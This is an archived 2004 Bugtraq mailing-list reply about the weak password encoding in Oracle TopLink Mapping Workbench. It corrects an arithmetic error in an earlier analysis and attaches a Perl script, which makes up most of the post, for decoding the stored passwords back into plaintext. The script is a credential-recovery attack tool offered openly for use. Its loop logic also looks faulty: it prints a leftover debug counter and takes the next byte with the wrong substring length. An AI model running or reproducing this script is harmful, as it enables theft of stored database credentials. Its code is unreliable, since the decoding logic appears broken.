[33321] in bugtraq
Re: Oracle toplink mapping workbench password algorithm
daemon@ATHENA.MIT.EDU (Martin)
Mon Feb 2 22:21:15 2004
Message-ID: <40180F11.4030601@mail.ptraced.net>
Date: Wed, 28 Jan 2004 16:35:45 -0300
From: Martin <broadcast@mail.ptraced.net>
MIME-Version: 1.0
To: "Mr. Bugtraq" <bugtraq@securityfocus.com>
In-Reply-To: <CBbg4GBjyvFARxLL@peterfinnigan.demon.co.uk>
Content-Type: multipart/mixed;
boundary="------------080509040200000805020907"
--------------080509040200000805020907
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Read the link, really interesting. There's a tiny mistake there tho, on
the example. 97 + 112 does not equal 224, no matter what. I was coding a
PERL script to decrypt the passwords, and I took the 'pa' '74E0'
example, since I was a bit lazy to code a "crypter". Well, here's a PERL
script that will decode the password, email me if you can improve it, or
if you find any errors (Im pretty sure it has, it's pretty ugly).
--------------080509040200000805020907
Content-Type: application/x-perl;
name="oracletest.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="oracletest.pl"
#!/usr/bin/perl
#Decrypt Oracle Toplink Mapping WorkBench passwords.
#Author: Martin
$string = "A7FCAA504BA7E4FC";
sub usage {
print " Usage: $0 <password to decrypt>\n";
}
if ($#ARGV != 0) {
usage();
}
else {
$encrypted = $ARGV[0];
$encrypted =~ s/$string/ /;
$chars = length($encrypted);
$enc2 = substr($encrypted,0,2);
$encrypted = substr($encrypted,2,length($encrypted));
$i = 0;
while (($chars / 2) >= $i + 1) {
print $i;
$int = hex($enc2);
if (($i%2) == 1) { $result .= chr($int - ( ($i + 1 )/3 ) - 112); }
else { $result .= chr($int - 4 + $i); }
$enc2 = substr($encrypted,0,length($encrypted) - 1);
$encrypted = substr($encrypted,2,length($encrypted));
$i++;
}
print "$result\n";
}
--------------080509040200000805020907--
